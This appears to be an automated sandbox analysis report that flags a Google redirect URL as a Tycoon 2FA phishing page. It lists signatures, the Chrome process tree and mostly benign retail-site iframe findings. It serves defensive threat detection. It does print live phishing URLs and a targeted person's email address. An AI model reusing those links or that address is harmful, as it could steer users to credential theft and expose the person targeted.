Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/cristorei.neemo.com.br/yaya/aALPghQuwJ38KMxdobOJdzxm/YW50b25lbGxhLmNvc3RhQGVzYS5pbnQ=

Overview

General Information

Sample URL:https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/cristorei.neemo.com.
Analysis ID:1545407
Infos:

Detection

Tycoon2FA
Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Tycoon 2FA PaaS
Connects to several IPs in different countries
HTML page contains hidden javascript code
Program does not show much activity (idle)
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6880 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 7108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=1948,i,17504933997799946318,5841356156298909647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 7820 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6356 --field-trial-handle=1948,i,17504933997799946318,5841356156298909647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 6668 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/cristorei.neemo.com.br/yaya/aALPghQuwJ38KMxdobOJdzxm/YW50b25lbGxhLmNvc3RhQGVzYS5pbnQ=" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
2.2.pages.csvJoeSecurity_Tycoon2FAYara detected Tycoon 2FA PaaSJoe Security
    2.3.pages.csvJoeSecurity_Tycoon2FAYara detected Tycoon 2FA PaaSJoe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: Yara matchFile source: 2.2.pages.csv, type: HTML
      Source: Yara matchFile source: 2.3.pages.csv, type: HTML
      Source: https://72w0xk.mativacyrin.com/gwxw63/#Dantonella.costa@esa.intHTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none" viewBox="0 0 26 26"><path fill="#d9d9d9" d="M13 0a13 13 0 1 0 0 26 13 13 0 0 0 0-26m0 24a11 11 0 1 1 0-22 11 11 0 0 1 0 22"/><path fill="#d9d9d9" d="m10.955 16.055-3.95-4.125-1.445...
      Source: https://www.overstock.com/HTTP Parser: Iframe src: https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-17006751@84/sandbox/modern/
      Source: https://www.overstock.com/HTTP Parser: Iframe src: https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-26050719@9/sandbox/modern/
      Source: https://www.overstock.com/HTTP Parser: Iframe src: https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-shopify-custom-pixel@0220/sandbox/modern/
      Source: https://www.overstock.com/HTTP Parser: Iframe src: https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-17006751@84/sandbox/modern/
      Source: https://www.overstock.com/HTTP Parser: Iframe src: https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-26050719@9/sandbox/modern/
      Source: https://www.overstock.com/HTTP Parser: Iframe src: https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-shopify-custom-pixel@0220/sandbox/modern/
      Source: https://www.overstock.com/HTTP Parser: Iframe src: https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-17006751@84/sandbox/modern/
      Source: https://www.overstock.com/HTTP Parser: Iframe src: https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-26050719@9/sandbox/modern/
      Source: https://www.overstock.com/HTTP Parser: Iframe src: https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-shopify-custom-pixel@0220/sandbox/modern/
      Source: https://www.overstock.com/HTTP Parser: Iframe src: https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-17006751@84/sandbox/modern/
      Source: https://www.overstock.com/HTTP Parser: Iframe src: https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-26050719@9/sandbox/modern/
      Source: https://www.overstock.com/HTTP Parser: Iframe src: https://www.overstock.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-shopify-custom-pixel@0220/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-98566460@6/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-117342524@10/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-126419260@1/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-shopify-custom-pixel@0220/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-98566460@6/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-117342524@10/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-126419260@1/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-shopify-custom-pixel@0220/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-98566460@6/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-117342524@10/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-126419260@1/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-shopify-custom-pixel@0220/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-98566460@6/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-117342524@10/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-126419260@1/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-shopify-custom-pixel@0220/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-98566460@6/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-117342524@10/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-126419260@1/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-shopify-custom-pixel@0220/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-98566460@6/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-117342524@10/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-126419260@1/sandbox/modern/
      Source: https://www.zulily.com/HTTP Parser: Iframe src: https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-shopify-custom-pixel@0220/sandbox/modern/
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-8MPQ3CZZFH&gacid=868463225.1730294606&gtm=45je4as0v880017861z89175873612za200zb9175873612&dma=0&gcs=G111&gcd=13n3n3n3n5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533421~101823848~101878899~101878944~101925629&z=1550620614
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1069816607?random=1730294606068&cv=11&fst=1730294606068&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v889680185z89175873612za201&gcd=13n3n3n3n5l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.bedbathandbeyond.com%2F&ref=https%3A%2F%2Fwww.overstock.com%2F&hn=www.googleadservices.com&frm=0&tiba=Bed%20Bath%20%26%20Beyond%20%7C%20The%20Best%20Deals%20Online%3A%20Furniture%2C%20Bedding%2C%20Rugs%2C%20Kitchen%20Essentials%20%26%20More&npa=0&pscdl=noapi&auid=1585853498.1730294602&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dpage_view
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1069816607?random=1730294606280&cv=11&fst=1730294606280&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v889680185z89175873612za200&gcd=13n3n3n3n5l1&dma=0&tag_exp=101533421~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.bedbathandbeyond.com%2F&ref=https%3A%2F%2Fwww.overstock.com%2F&hn=www.googleadservices.com&frm=0&tiba=Bed%20Bath%20%26%20Beyond%20%7C%20The%20Best%20Deals%20Online%3A%20Furniture%2C%20Bedding%2C%20Rugs%2C%20Kitchen%20Essentials%20%26%20More&npa=0&pscdl=noapi&auid=1585853498.1730294602&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://ct.pinterest.com/ct.html
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-8MPQ3CZZFH&gacid=868463225.1730294606&gtm=45je4as0v880017861z89175873612za200zb9175873612&dma=0&gcs=G111&gcd=13n3n3n3n5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533421~101823848~101878899~101878944~101925629&z=1550620614
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1069816607?random=1730294606068&cv=11&fst=1730294606068&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v889680185z89175873612za201&gcd=13n3n3n3n5l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.bedbathandbeyond.com%2F&ref=https%3A%2F%2Fwww.overstock.com%2F&hn=www.googleadservices.com&frm=0&tiba=Bed%20Bath%20%26%20Beyond%20%7C%20The%20Best%20Deals%20Online%3A%20Furniture%2C%20Bedding%2C%20Rugs%2C%20Kitchen%20Essentials%20%26%20More&npa=0&pscdl=noapi&auid=1585853498.1730294602&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dpage_view
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1069816607?random=1730294606280&cv=11&fst=1730294606280&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v889680185z89175873612za200&gcd=13n3n3n3n5l1&dma=0&tag_exp=101533421~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.bedbathandbeyond.com%2F&ref=https%3A%2F%2Fwww.overstock.com%2F&hn=www.googleadservices.com&frm=0&tiba=Bed%20Bath%20%26%20Beyond%20%7C%20The%20Best%20Deals%20Online%3A%20Furniture%2C%20Bedding%2C%20Rugs%2C%20Kitchen%20Essentials%20%26%20More&npa=0&pscdl=noapi&auid=1585853498.1730294602&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-8MPQ3CZZFH&gacid=868463225.1730294606&gtm=45je4as0v880017861z89175873612za200zb9175873612&dma=0&gcs=G111&gcd=13n3n3n3n5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533421~101823848~101878899~101878944~101925629&z=1550620614
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1069816607?random=1730294606068&cv=11&fst=1730294606068&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v889680185z89175873612za201&gcd=13n3n3n3n5l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.bedbathandbeyond.com%2F&ref=https%3A%2F%2Fwww.overstock.com%2F&hn=www.googleadservices.com&frm=0&tiba=Bed%20Bath%20%26%20Beyond%20%7C%20The%20Best%20Deals%20Online%3A%20Furniture%2C%20Bedding%2C%20Rugs%2C%20Kitchen%20Essentials%20%26%20More&npa=0&pscdl=noapi&auid=1585853498.1730294602&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dpage_view
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1069816607?random=1730294606280&cv=11&fst=1730294606280&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v889680185z89175873612za200&gcd=13n3n3n3n5l1&dma=0&tag_exp=101533421~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.bedbathandbeyond.com%2F&ref=https%3A%2F%2Fwww.overstock.com%2F&hn=www.googleadservices.com&frm=0&tiba=Bed%20Bath%20%26%20Beyond%20%7C%20The%20Best%20Deals%20Online%3A%20Furniture%2C%20Bedding%2C%20Rugs%2C%20Kitchen%20Essentials%20%26%20More&npa=0&pscdl=noapi&auid=1585853498.1730294602&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://gum.criteo.com/syncframe?topUrl=www.bedbathandbeyond.com&origin=onetag#{"bundle":{"identifierExtractor":{"origin":0},"value":null},"cw":true,"optout":{"identifierExtractor":{"origin":0},"value":null},"origin":"onetag","tld":"bedbathandbeyond.com","topUrl":"www.bedbathandbeyond.com","version":"5_29_0","ifa":{"identifierExtractor":{"origin":0},"value":null},"lsw":true,"pm":0}
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/ga/rul?tid=G-8MPQ3CZZFH&gacid=868463225.1730294606&gtm=45je4as0v880017861z89175873612za200zb9175873612&dma=0&gcs=G111&gcd=13n3n3n3n5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533421~101823848~101878899~101878944~101925629&z=1550620614
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1069816607?random=1730294606068&cv=11&fst=1730294606068&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v889680185z89175873612za201&gcd=13n3n3n3n5l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.bedbathandbeyond.com%2F&ref=https%3A%2F%2Fwww.overstock.com%2F&hn=www.googleadservices.com&frm=0&tiba=Bed%20Bath%20%26%20Beyond%20%7C%20The%20Best%20Deals%20Online%3A%20Furniture%2C%20Bedding%2C%20Rugs%2C%20Kitchen%20Essentials%20%26%20More&npa=0&pscdl=noapi&auid=1585853498.1730294602&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dpage_view
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/1069816607?random=1730294606280&cv=11&fst=1730294606280&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v889680185z89175873612za200&gcd=13n3n3n3n5l1&dma=0&tag_exp=101533421~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.bedbathandbeyond.com%2F&ref=https%3A%2F%2Fwww.overstock.com%2F&hn=www.googleadservices.com&frm=0&tiba=Bed%20Bath%20%26%20Beyond%20%7C%20The%20Best%20Deals%20Online%3A%20Furniture%2C%20Bedding%2C%20Rugs%2C%20Kitchen%20Essentials%20%26%20More&npa=0&pscdl=noapi&auid=1585853498.1730294602&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://gum.criteo.com/syncframe?topUrl=www.bedbathandbeyond.com&origin=onetag#{"bundle":{"identifierExtractor":{"origin":0},"value":null},"cw":true,"optout":{"identifierExtractor":{"origin":0},"value":null},"origin":"onetag","tld":"bedbathandbeyond.com","topUrl":"www.bedbathandbeyond.com","version":"5_29_0","ifa":{"identifierExtractor":{"origin":0},"value":null},"lsw":true,"pm":0}
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://us.creativecdn.com/ig-membership?ntk=9B5RYrxxXdnA25atzWNK6c6yVM8fIRtEZzsT_T2AwgLN8wqK_LIiDH34FH8D-qqmhIxUBsvHjN-NugGdQnLBDKxjlWVmazMsFmNuKy3pG14
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://us.creativecdn.com/topics-membership?ntk=V0RBDrhWHDt_E5vDl5vUB2VrQslMwm7fxXE1WA6PuO6gSu59BrMUnCn38hf6ycZXiqu_tTgvV92fChqAyF2R25xmerCP2QrHW0ip1Hvq3Qo
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://prod.accdab.net/beacon/bf/bf.html?v=202009_01
      Source: https://www.bedbathandbeyond.com/HTTP Parser: Iframe src: https://fledge.us.criteo.com/interest-group?data=9d79Jnx3STl4dFVGWExlMnFkL3NDR3BYd3VSdE13UlNXLzBxZ2JlOFVka0YwRTFkemdMVC9teWFzTDJqdm9QOFUyeVZiTFlLMzhqSEE1SnQ5cnBkWEc0N3BhY3pjN01NK3N5a2hwUW9ETmdUb0hVNzlzRElYOTFhaWJZWDhYSmN2VGJaekxQSkRIZFFlenFPL295OVViTjZlZXNuYWEzZWk5Y2xtMmdKQytudHhMcjJJRXBRcUNSVTVBWEQ3d3NWNWE4MDF8
      Source: https://72w0xk.mativacyrin.com/gwxw63/#Dantonella.costa@esa.intHTTP Parser: No favicon
      Source: https://72w0xk.mativacyrin.com/gwxw63/#Dantonella.costa@esa.intHTTP Parser: No favicon
      Source: https://www.overstock.com/HTTP Parser: No favicon
      Source: https://www.overstock.com/HTTP Parser: No favicon
      Source: https://www.overstock.com/HTTP Parser: No favicon
      Source: https://www.overstock.com/HTTP Parser: No favicon
      Source: https://www.overstock.com/HTTP Parser: No favicon
      Source: https://www.overstock.com/HTTP Parser: No favicon
      Source: https://www.zulily.com/HTTP Parser: No favicon
      Source: https://www.bedbathandbeyond.com/HTTP Parser: No favicon
      Source: https://www.bedbathandbeyond.com/HTTP Parser: No favicon
      Source: https://www.bedbathandbeyond.com/HTTP Parser: No favicon
      Source: https://www.bedbathandbeyond.com/HTTP Parser: No favicon
      Source: https://www.bedbathandbeyond.com/HTTP Parser: No favicon
      Source: https://www.bedbathandbeyond.com/HTTP Parser: No favicon
      Source: https://www.bedbathandbeyond.com/HTTP Parser: No favicon
      Source: https://www.bedbathandbeyond.com/HTTP Parser: No favicon
      Source: https://www.bedbathandbeyond.com/HTTP Parser: No favicon
      Source: https://www.bedbathandbeyond.com/HTTP Parser: No favicon
      Source: https://www.bedbathandbeyond.com/HTTP Parser: No favicon
      Source: https://www.bedbathandbeyond.com/HTTP Parser: No favicon
      Source: https://www.overstock.com/collections/furnitureHTTP Parser: No favicon
      Source: https://www.overstock.com/collections/furnitureHTTP Parser: No favicon
      Source: https://www.overstock.com/collections/furnitureHTTP Parser: No favicon
      Source: https://www.overstock.com/collections/furnitureHTTP Parser: No favicon
      Source: https://www.overstock.com/collections/furnitureHTTP Parser: No favicon
      Source: https://www.overstock.com/products/mia-oversized-modular-sectional-fabric-sofa-38169103?variant=50892052725919&searchidx=0HTTP Parser: No favicon
      Source: https://www.overstock.com/products/mia-oversized-modular-sectional-fabric-sofa-38169103?variant=50892052725919&searchidx=0HTTP Parser: No favicon
      Source: https://www.overstock.com/products/mia-oversized-modular-sectional-fabric-sofa-38169103?variant=50892052725919&searchidx=0HTTP Parser: No favicon
      Source: https://www.overstock.com/products/mia-oversized-modular-sectional-fabric-sofa-38169103?variant=50892052725919&searchidx=0HTTP Parser: No favicon
      Source: https://www.overstock.com/products/mia-oversized-modular-sectional-fabric-sofa-38169103?variant=50892052725919&searchidx=0HTTP Parser: No favicon
      Source: https://www.overstock.com/HTTP Parser: No <meta name="author".. found
      Source: https://www.overstock.com/HTTP Parser: No <meta name="author".. found
      Source: https://www.overstock.com/HTTP Parser: No <meta name="author".. found
      Source: https://www.overstock.com/HTTP Parser: No <meta name="author".. found
      Source: https://www.zulily.com/HTTP Parser: No <meta name="author".. found
      Source: https://www.zulily.com/HTTP Parser: No <meta name="author".. found
      Source: https://www.zulily.com/HTTP Parser: No <meta name="author".. found
      Source: https://www.zulily.com/HTTP Parser: No <meta name="author".. found
      Source: https://www.zulily.com/HTTP Parser: No <meta name="author".. found
      Source: https://www.zulily.com/HTTP Parser: No <meta name="author".. found
      Source: https://www.overstock.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://www.overstock.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://www.overstock.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://www.overstock.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://www.zulily.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://www.zulily.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://www.zulily.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://www.zulily.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://www.zulily.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://www.zulily.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://www.bedbathandbeyond.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://www.bedbathandbeyond.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://www.bedbathandbeyond.com/HTTP Parser: No <meta name="copyright".. found
      Source: https://www.bedbathandbeyond.com/HTTP Parser: No <meta name="copyright".. found
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
      Source: unknownNetwork traffic detected: IP country count 11
      Source: chromecache_1486.1.dr, chromecache_851.1.dr, chromecache_1142.1.dr, chromecache_564.1.dr, chromecache_856.1.dr, chromecache_1150.1.dr, chromecache_1166.1.drString found in binary or memory: <a class="social__link flex items-center justify-center" href="https://www.facebook.com/overstock" target="_blank" rel="noopener" title="Overstock on Facebook"><svg width="24" height="24" viewBox="0 0 14222 14222" fill="currentColor" aria-hidden="true" focusable="false" role="presentation" class="icon"><path d="M14222 7112c0 3549.352-2600.418 6491.344-6000 7024.72V9168h1657l315-2056H8222V5778c0-562 275-1111 1159-1111h897V2917s-814-139-1592-139c-1624 0-2686 984-2686 2767v1567H4194v2056h1806v4968.72C2600.418 13603.344 0 10661.352 0 7112 0 3184.703 3183.703 1 7111 1s7111 3183.703 7111 7111Zm-8222 7025c362 57 733 86 1111 86-377.945 0-749.003-29.485-1111-86.28Zm2222 0v-.28a7107.458 7107.458 0 0 1-167.717 24.267A7407.158 7407.158 0 0 0 8222 14137Zm-167.717 23.987C7745.664 14201.89 7430.797 14223 7111 14223c319.843 0 634.675-21.479 943.283-62.013Z"/></svg><span class="visually-hidden">Facebook</span> equals www.facebook.com (Facebook)
      Source: chromecache_1486.1.dr, chromecache_851.1.dr, chromecache_1142.1.dr, chromecache_564.1.dr, chromecache_856.1.dr, chromecache_1150.1.dr, chromecache_1166.1.drString found in binary or memory: <a class="social__link flex items-center justify-center" href="https://www.youtube.com/c/@overstock" target="_blank" rel="noopener" title="Overstock on YouTube"><svg width="24" height="17" viewBox="0 0 48 34" fill="currentColor" aria-hidden="true" focusable="false" role="presentation" class="icon"><path d="m19.044 23.27-.001-13.582 12.968 6.814-12.967 6.768ZM47.52 7.334s-.47-3.33-1.908-4.798C43.787.61 41.74.601 40.803.49 34.086 0 24.01 0 24.01 0h-.02S13.914 0 7.197.49c-.939.11-2.984.12-4.81 2.045C.947 4.003.48 7.334.48 7.334S0 11.247 0 15.158v3.668c0 3.912.48 7.823.48 7.823s.468 3.331 1.906 4.798c1.827 1.926 4.226 1.866 5.294 2.067C11.52 33.885 24 34 24 34s10.086-.015 16.803-.505c.938-.113 2.984-.122 4.809-2.048 1.439-1.467 1.908-4.798 1.908-4.798s.48-3.91.48-7.823v-3.668c0-3.911-.48-7.824-.48-7.824Z"/></svg><span class="visually-hidden">YouTube</span> equals www.youtube.com (Youtube)
